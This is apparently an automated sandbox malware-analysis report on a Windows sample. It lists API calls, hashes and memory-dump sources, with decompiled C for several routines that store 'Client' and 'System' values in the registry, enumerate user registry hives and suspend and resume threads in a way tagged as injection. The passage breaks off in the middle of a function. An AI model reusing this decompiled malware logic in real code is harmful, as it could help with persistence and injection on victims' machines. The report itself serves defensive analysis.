RegQueryValueExA.KERNELBASE(?,Client,00000000,00000000,0542D068,?,00000001,?,00000001,00000000,75144D40,00000000,0540CEC1,?,?), ref: 05416642
RegSetValueExA.KERNELBASE(00000028,Client,00000000,00000003,0542D068,00000028,?,?,?,?,?,?,?,?,0540202D,?), ref: 05416681
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,0540202D,?), ref: 0541668D

Strings

Client, xrefs: 05416629, 0541663B, 0541667D, 054166AC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: Client
API String ID: 2552977122-3236430179
Opcode ID: affef148c295cf089dfff7571edd7ab4d05592c9209ea961d434dbd6997c63e3
Instruction ID: f471e47526a1c1b431c2ed7fbea1f68d83a4a93006f157ca5a7ad952d4d10a96
Opcode Fuzzy Hash: affef148c295cf089dfff7571edd7ab4d05592c9209ea961d434dbd6997c63e3
Instruction Fuzzy Hash: 1B214F71E40228AFEB209F55DD45FEE7FB8EB04714F90006AF904A7290DB709946CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0541BA6C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0541EB66: lstrlenW.KERNEL32(00000000,00000000,00000000,75145520,?,?,0540346B,?), ref: 0541EB72
Part of subcall function 0541EB66: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0540346B,?), ref: 0541EB9A
Part of subcall function 0541EB66: memset.NTDLL ref: 0541EBAC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,75144D40), ref: 0541BAC2
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 0541BADE
RegCloseKey.KERNELBASE(?), ref: 0541BAEF

Strings

System, xrefs: 0541BAA2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID: System
API String ID: 830012212-3470857405
Opcode ID: 07dce5e52158fc0312f6a1d76e19ca75eb50b0436d13c9e4f7955ede68c5b5e7
Instruction ID: 1e4b45e08bf44c059b104ff02932ff6d38d4b378bae8cb7fe905944a7f562b74
Opcode Fuzzy Hash: 07dce5e52158fc0312f6a1d76e19ca75eb50b0436d13c9e4f7955ede68c5b5e7
Instruction Fuzzy Hash: 6B117076A10118BBEB10DBA5CD49FEF7BBCEB44600F5040AAB505D6140EB70DA198B28

Uniqueness

Uniqueness Score: -1.00%

Function 0541172E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 05407DEB: RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
Part of subcall function 05407DEB: lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

RegQueryValueExA.KERNELBASE(?,System,00000000,0540CEC6,?,?,00000001,?,00000001,00000000,?,?,?,00000000,0540CEC6), ref: 0541176C
RegSetValueExA.KERNELBASE(?,System,00000000,00000003,?,00000010,?,?,?,00000000,0540CEC6), ref: 0541179E
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0540CEC6), ref: 054117C0

Strings

System, xrefs: 0541175C, 05411761, 0541179A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: System
API String ID: 2552977122-3470857405
Opcode ID: 2f9309629a892132da1e89061988e89dffc09dfa62fce4fea223d1a75b69f7fb
Instruction ID: 84cd1efc9e8bd80d21f91a3f3ff7c8c76522b155b89b8a563277682cab5189d2
Opcode Fuzzy Hash: 2f9309629a892132da1e89061988e89dffc09dfa62fce4fea223d1a75b69f7fb
Instruction Fuzzy Hash: F4110D75E00228BFEF209BA5DC49FEEBFB8FB44710F5000A6EA11A7290D7705A45DB95

Uniqueness

Uniqueness Score: -1.00%

Function 05424948, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05424976
ResumeThread.KERNELBASE(0540202D,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 05424A00
WaitForSingleObject.KERNEL32(00000064), ref: 05424A0E
SuspendThread.KERNELBASE(0540202D), ref: 05424A21

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: a30f456095b24ffcbd241cc0c05c472b1384d7f5312873d570f025959056da3d
Instruction ID: bc0ccd38bc5441b5bcd1cbe85dbd18fcce4b1b562dba5dd4c4c3ed6b4b51fa75
Opcode Fuzzy Hash: a30f456095b24ffcbd241cc0c05c472b1384d7f5312873d570f025959056da3d
Instruction Fuzzy Hash: 12418E71108321AFEB21DF50C845EABBBE9FF88310F50492EF695862A0DB71D914CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02778861, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 027788B8
SysAllocString.OLEAUT32(0277A412), ref: 027788FB
SysFreeString.OLEAUT32(00000000), ref: 0277890F
SysFreeString.OLEAUT32(00000000), ref: 0277891D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 223ce941559c9d10e38a14d6005e5b1001a9f8c314a454b78aeb0dfb89c2779d
Instruction ID: a7c95f7779f07df65c4a3eab8d0c8db3d8b5d2ca6f20fcdc4594311b9edb65f7
Opcode Fuzzy Hash: 223ce941559c9d10e38a14d6005e5b1001a9f8c314a454b78aeb0dfb89c2779d
Instruction Fuzzy Hash: 2D311C71900109EFCB05DF98D8C88AE7BB9FF48344B11842EF50AA7210E7759A45DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 027757B9, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027757B9(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E027775C4(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E02774C31(_v28);
							goto L17;
						}
						_t42 = E0277A360(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E02774C31(_v24);
						_v20 = _v16;
						_t47 = E027775C4(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x277d224, 0) == 0x102);
				goto L16;
			}

0x027757b9
0x027757d3
0x027757d6
0x027757d9
0x027757dc
0x027757df
0x027757e5
0x027757e9
0x027758c3
0x027758c7
0x027758c7
0x027757f2
0x027757f9
0x02775800
0x02775803
0x027758b8
0x027758bb
0x00000000
0x027758c1
0x02775809
0x0277580c
0x02775813
0x0277581d
0x02775826
0x0277582c
0x02775834
0x0277586c
0x027758a6
0x027758ac
0x027758ae
0x027758ae
0x027758b0
0x027758b3
0x00000000
0x027758b3
0x02775881
0x02775886
0x0277588a
0x00000000
0x00000000
0x00000000
0x0277588a
0x02775839
0x02775848
0x00000000
0x00000000
0x0277584d
0x02775856
0x02775859
0x02775860
0x02775863
0x0277583e
0x0277583e
0x00000000
0x0277583e
0x02775867
0x00000000
0x02775867
0x0277583b
0x00000000
0x0277588c
0x02775899
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0277544E,?), ref: 027757DF

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

RegEnumKeyExA.KERNELBASE(?,?,?,0277544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0277544E), ref: 02775826
WaitForSingleObject.KERNEL32(00000000,?,?,?,0277544E,?,0277544E,?,?,?,?,?,0277544E,?), ref: 02775893
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0277544E,?,?,?,?,?,027738C3,?), ref: 027758BB

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: f8e587a933c0acf5f34d296c59848f15208be9e975aec0120e27603a0570b418
Instruction ID: 9cb65c09789e86521954d720efe3f2fd9ac5a9341dfddec198495ac3f34060e2
Opcode Fuzzy Hash: f8e587a933c0acf5f34d296c59848f15208be9e975aec0120e27603a0570b418
Instruction Fuzzy Hash: CB313872C00219EFDF22AFA9CC86EEEFBB9EF45310F508066E921B2150D3704A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05414213, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000001,0540E59D,?,00000000,?,?,?,?,?,0540E59D,?), ref: 05414265
memcpy.NTDLL(?,?,?,?,?,?,?,?,0540E59D,?), ref: 054142F6
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,0540E59D), ref: 05414311

Strings

Feb 12 2021, xrefs: 05414286

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Feb 12 2021
API String ID: 4010158826-2916597941
Opcode ID: 2d40c7401a5db0c17784c3c4d9f8605065f94d9adfa4f01ee03818f84cf37407
Instruction ID: df8e8f928ffc432f8c6803b2f79a917263dd60beb6acfe81fa113e996fb280cc
Opcode Fuzzy Hash: 2d40c7401a5db0c17784c3c4d9f8605065f94d9adfa4f01ee03818f84cf37407
Instruction Fuzzy Hash: A7316371F00219ABDF15CF99D881BEEB7B9BF08304F54016AE905FB280D771AA56CB94

Uniqueness

Uniqueness Score: -1.00%

Function 027753BE, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E027753BE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E02778A0C(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02775758(_t23);
						}
					}
					return _t38;
				}
				_t26 = E02776D86(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x277d234, 1, 0,  *0x277d2f8);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E027757B9(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0277A360(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E027730BF(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02774838( &_v32, _t39);
					goto L13;
				}
			}

0x027753be
0x027753cb
0x027753d1
0x027753d2
0x027753d3
0x027753d4
0x027753d5
0x027753d9
0x027753e0
0x027753e5
0x027753e9
0x02775471
0x02775471
0x02775474
0x02775476
0x0277547e
0x02775484
0x02775487
0x02775487
0x02775484
0x02775492
0x02775492
0x027753f5
0x027753fc
0x027753fe
0x027753fe
0x02775415
0x02775419
0x0277541c
0x02775427
0x0277542e
0x0277542e
0x0277543a
0x0277543b
0x02775449
0x0277543d
0x0277543d
0x0277543e
0x0277543f
0x02775440
0x02775441
0x02775442
0x02775442
0x0277544e
0x02775453
0x02775455
0x02775457
0x02775457
0x0277545e
0x00000000
0x02775460
0x02775460
0x0277546d
0x00000000
0x0277546d

APIs

CreateEventA.KERNEL32(0277D234,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,027738C3,?,00000001), ref: 0277540F
SetEvent.KERNEL32(00000000,?,?,?,?,027738C3,?,00000001,02777A05,00000002,?,?,02777A05), ref: 0277541C
Sleep.KERNELBASE(00000BB8,?,?,?,?,027738C3,?,00000001,02777A05,00000002,?,?,02777A05), ref: 02775427
CloseHandle.KERNEL32(00000000,?,?,?,?,027738C3,?,00000001,02777A05,00000002,?,?,02777A05), ref: 0277542E

Part of subcall function 027757B9: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0277544E,?), ref: 027757DF
Part of subcall function 027757B9: RegEnumKeyExA.KERNELBASE(?,?,?,0277544E,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0277544E), ref: 02775826
Part of subcall function 027757B9: WaitForSingleObject.KERNEL32(00000000,?,?,?,0277544E,?,0277544E,?,?,?,?,?,0277544E,?), ref: 02775893
Part of subcall function 027757B9: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0277544E,?,?,?,?,?,027738C3,?), ref: 027758BB

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 3cf3464825f7719950fc4590f9c410cb46a001f5debb570e9430d7c9cf31f2f9
Instruction ID: 1478bb60616a5c9a0b49be4881132a6866a9b481ef590895354474e7ba736a09
Opcode Fuzzy Hash: 3cf3464825f7719950fc4590f9c410cb46a001f5debb570e9430d7c9cf31f2f9
Instruction Fuzzy Hash: 4521A772D00219AFCF21AFE488849EE7779AF05355B858839EE11B7100D730D945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02774E6B, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02774E6B(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E027775C4(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02774e77
0x02774e7b
0x02774e7c
0x02774e7d
0x02774e7f
0x02774e81
0x02774e86
0x02774e89
0x02774f20
0x02774f27
0x02774f27
0x02774e92
0x02774e99
0x02774ea9
0x02774ea9
0x02774eaf
0x02774eb1
0x02774eb6
0x02774ebf
0x02774ec7
0x02774eca
0x02774ed5
0x02774ed9
0x02774edb
0x02774edc
0x02774ee5
0x02774ee9
0x02774efa
0x02774eeb
0x02774ef0
0x02774ef5
0x02774f04
0x02774f04
0x02774ed9
0x02774f0a
0x02774f10
0x02774f10
0x02774f19
0x02774f1e
0x02774f1e
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02774E99
lstrlenW.KERNEL32(?), ref: 02774ECF
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 02774EF0
SysFreeString.OLEAUT32(?), ref: 02774F04

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 93673c34109ceab44bb1164c9382ea5e9fa5ed2522d859157f8ea1fb5ee49578
Instruction ID: fca150ae2a4fd4f3360968c226a21be687c23446553759a9e0fcad75a294838a
Opcode Fuzzy Hash: 93673c34109ceab44bb1164c9382ea5e9fa5ed2522d859157f8ea1fb5ee49578
Instruction Fuzzy Hash: CD217F75E01209EFCF11DFA4D888E9EBBB9FF49305B1481A9E906E7210E770DA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0541C671, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(0541F40E,?,00000000,0541F40E,00000000,?,00000000,?,?,?,?,0541F40E,?,Client32,?,?), ref: 0541C696
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0541C6AD
HeapFree.KERNEL32(00000000,00000000,?,?,?,0541F40E,?,Client32,?,?,?,0542137E), ref: 0541C6C8
RegQueryValueExA.KERNELBASE(0541F40E,?,00000000,0541F40E,00000000,?,?,?,?,0541F40E,?,Client32,?,?,?,0542137E), ref: 0541C6E7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 2422eb83ea9fb82831a5665c5fd9fcff5be71ae3cddf764eccb2860e2ada8c3c
Instruction ID: 1843ee40b6b3e9032bf299610e3da9094283432baa8fae9e23e0c8cc8c1b45a8
Opcode Fuzzy Hash: 2422eb83ea9fb82831a5665c5fd9fcff5be71ae3cddf764eccb2860e2ada8c3c
Instruction Fuzzy Hash: AA1128B6950118FFDB229F95DC85CEEBBBDFB89250B104096F901A3210D6715E41DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0540B29E, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0542E098,00000000,0540F655,?,05402498,?), ref: 0540B2BD
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0542E098,00000000,0540F655,?,05402498,?), ref: 0540B2C8
_wcsupr.NTDLL ref: 0540B2D5
lstrlenW.KERNEL32(00000000), ref: 0540B2DD

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: e9fc419ce6c65606591e8349a730a3d0fe7e6c0453f61df48c5cd5100c937558
Instruction ID: 836984420550a49961399c29dece9736175f891aa389933e912850ee79dee672
Opcode Fuzzy Hash: e9fc419ce6c65606591e8349a730a3d0fe7e6c0453f61df48c5cd5100c937558
Instruction Fuzzy Hash: 25F0E9323157362F93266A775D8DEEF6A5DFF81A50732103EF901D2180DE70C8015665

Uniqueness

Uniqueness Score: -1.00%

Function 05407134, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05407153

Part of subcall function 054159FC: RtlEnterCriticalSection.NTDLL(00000000), ref: 05415A08
Part of subcall function 054159FC: CloseHandle.KERNEL32(?), ref: 05415A16
Part of subcall function 054159FC: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05415A32

FindCloseChangeNotification.KERNELBASE(?), ref: 05407161
InterlockedDecrement.KERNEL32(0542DF5C), ref: 05407170

Part of subcall function 0540D933: SetEvent.KERNEL32(000003AC,0540718B), ref: 0540D93D
Part of subcall function 0540D933: CloseHandle.KERNEL32(000003AC), ref: 0540D952
Part of subcall function 0540D933: HeapDestroy.KERNELBASE(05560000), ref: 0540D962

RtlExitUserThread.NTDLL(00000000), ref: 0540718C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
String ID:
API String ID: 2993087875-0
Opcode ID: 53c053c2a76ffea8f72776ce6376f20aa188f37b48d4ea13e1c66f6adb727941
Instruction ID: 8b0e8e889adca5008a213d6af114a563f3ff9f4f62293fd176d9d2e454c1fe55
Opcode Fuzzy Hash: 53c053c2a76ffea8f72776ce6376f20aa188f37b48d4ea13e1c66f6adb727941
Instruction Fuzzy Hash: 54F08130950320BBD7155F699C4AEEE3F38EB41730BA1025AF626872C0DB7459028AAA

Uniqueness

Uniqueness Score: -1.00%

Function 02774C46, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02774C46() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t54;

				_v12 = 0;
				_t23 = E02776D86(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x277d230; // 0x27ba5a8
				_t4 = _t24 + 0x277ed80; // 0x4f39328
				_t5 = _t24 + 0x277ed28; // 0x4f0053
				_t26 = E02774195( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x277d230; // 0x27ba5a8
						_t11 = _t32 + 0x277ed74; // 0x4f3931c
						_t48 = _t11;
						_t12 = _t32 + 0x277ed28; // 0x4f0053
						_t54 = E02777AC8(_t11, _t12, _t11);
						_t58 = _t54;
						if(_t54 != 0) {
							_t35 =  *0x277d230; // 0x27ba5a8
							_t13 = _t35 + 0x277edbe; // 0x30314549
							_t37 = E02775BC3(_t48, _t58, _v8, _t54, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t60 =  *0x277d214 - 6;
								if( *0x277d214 <= 6) {
									_t42 =  *0x277d230; // 0x27ba5a8
									_t15 = _t42 + 0x277ebda; // 0x52384549
									E02775BC3(_t48, _t60, _v8, _t54, _t15, 0x13);
								}
							}
							_t38 =  *0x277d230; // 0x27ba5a8
							_t17 = _t38 + 0x277edb8; // 0x4f39360
							_t18 = _t38 + 0x277ed90; // 0x680043
							_t45 = E02773FF3(_v8, 0x80000001, _t54, _t18, _t17);
							HeapFree( *0x277d1f0, 0, _t54);
						}
					}
					HeapFree( *0x277d1f0, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E027730BF(_t53);
				}
				return _t45;
			}

0x02774c56
0x02774c59
0x02774c60
0x02774c62
0x02774c62
0x02774c65
0x02774c6a
0x02774c71
0x02774c7e
0x02774c83
0x02774c87
0x02774c95
0x02774ca3
0x02774ca7
0x02774d38
0x02774d38
0x02774cad
0x02774cad
0x02774cb2
0x02774cb2
0x02774cb9
0x02774cc5
0x02774cc7
0x02774cc9
0x02774ccb
0x02774cd2
0x02774cdd
0x02774ce4
0x02774ce6
0x02774ced
0x02774cef
0x02774cf6
0x02774d01
0x02774d01
0x02774ced
0x02774d06
0x02774d0b
0x02774d12
0x02774d30
0x02774d32
0x02774d32
0x02774cc9
0x02774d44
0x02774d44
0x02774d46
0x02774d4b
0x02774d4d
0x02774d4d
0x02774d58

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F39328,00000000,?,7519F710,00000000,7519F730), ref: 02774C95
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F39360,?,00000000,30314549,00000014,004F0053,04F3931C), ref: 02774D32
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02773858), ref: 02774D44

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 434fb7ea45ebc3c02dad352804b68424bb69f1a677272f0f4caab24ec436701b
Instruction ID: fc7874012459af28955f22878f67d9a1f1c0f52c367aad4928bfc68881cfa5ab
Opcode Fuzzy Hash: 434fb7ea45ebc3c02dad352804b68424bb69f1a677272f0f4caab24ec436701b
Instruction Fuzzy Hash: EA318F71940109BFDF21EB92DD88EEB7BBDEF45304F1644A6E600A7160D7709E19DB60

Uniqueness

Uniqueness Score: -1.00%

Function 027780F6, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E027780F6(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x277d230; // 0x27ba5a8
				_t2 = _t22 + 0x277e671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x277d204 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x277d204 =  *0x277d204 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E02775AC5(_t49, _t48); // executed
